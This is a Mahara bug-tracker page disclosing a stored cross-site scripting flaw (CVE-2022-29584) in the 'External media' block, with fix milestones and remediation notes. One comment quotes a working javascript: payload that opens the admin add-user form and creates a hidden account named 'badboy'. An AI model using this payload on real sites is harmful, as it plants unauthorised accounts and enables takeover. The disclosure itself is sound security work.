Mahara

XSS exploit in 'External media' block

Bug #1968920 reported by Kristina Hoeppner on 2022-04-13

258

This bug affects 1 person

	Status	Importance	Assigned to	Milestone
Mahara	Fix Released	High	Gold	Mahara 22.04.0
20.10	Fix Released	High	Unassigned	Mahara 20.10.5
21.04	Fix Released	High	Unassigned	Mahara 21.04.4
21.10	Fix Released	High	Unassigned	Mahara 21.10.2
22.04	Fix Released	High	Gold	Mahara 22.04.0

Bug Description

When you put the following into the 'External media' block, you get an alert pop-up window.

In contrast to text blocks where the 'javascript:alert' is stripped out, this is not the case in 'External media'.

It wasn't a problem when the class wasn't present, but with the class, a pop-up with the current domain is displayed.

See original description

CVE References

2022-29584

Kristina Hoeppner (kris-hoeppner) on 2022-04-13

description:

updated

Kristina Hoeppner (kris-hoeppner) on 2022-04-21

Changed in mahara:
status:	New → Confirmed
importance:	Undecided → High

Revision history for this message

Kristina Hoeppner (kris-hoeppner) wrote on 2022-04-21:

Example exploit:

<a class="embedly-card" href="javascript: {var TestFenster = http://window.open('../admin/users/add.php','TestWindow','width=800,height=800,left=100,top=50');function fill() {TestWindow.adduser.username.value='badboy';TestWindow.adduser.firstname.value='Bad';TestWindow.adduser.lastname.value='Boy';http://<email address hidden>';TestWindow.adduser.password.value='Secret+12345';https://t.co/f2YTjI3B9B();}TestWindow.addEventListener('load',fill);}">open the gate</a>

Note: I'm not sure about the 't.co' URL as that might have been converted from Twitter as it was sent via a DM.

---------------------

Things to keep in mind:

- we'd probably need to allow protocol free urls too, eg allow strings starting with 'http://', 'https://', and '://'
- sanitize the URL
- Alternatively, the sanity check could be done here:
/htdocs/blocktype/externalvideo/embed_services/embedly/embedservice.php#L61

Revision history for this message

Kristina Hoeppner (kris-hoeppner) wrote on 2022-04-22 (last edit on 2022-04-26):

Vulnerability type: Cross-site scripting (XSS) / stored XSS
Attack type: Remote
Impact: Code execution

Affected components: The 'External media' block and anywhere you can enter HTML code, such as a text block, notes, journal entry, and forum post.

Suggested description: Mahara before 20.10.5, 21.04.4, 21.10.2, and 22.04.0 are vulnerable to stored cross-site scripting when a particular CSS class for embedly is used and JavaScript code constructed to perform an action.

Reported by: Can't disclose
Bug report: https://bugs.launchpad.net/mahara/+bug/1968920
CVE reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29584

Robert Lyon (robertl-9) on 2022-04-26

no longer affects:	mahara/20.10
no longer affects:	mahara/22.10

Gold (gold.catalyst) on 2022-04-26

information type:

Private Security → Public Security

Report a bug

This report contains Public Security information

Everyone can see this security related information.

You are

Subscribing...

Edit bug mail

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.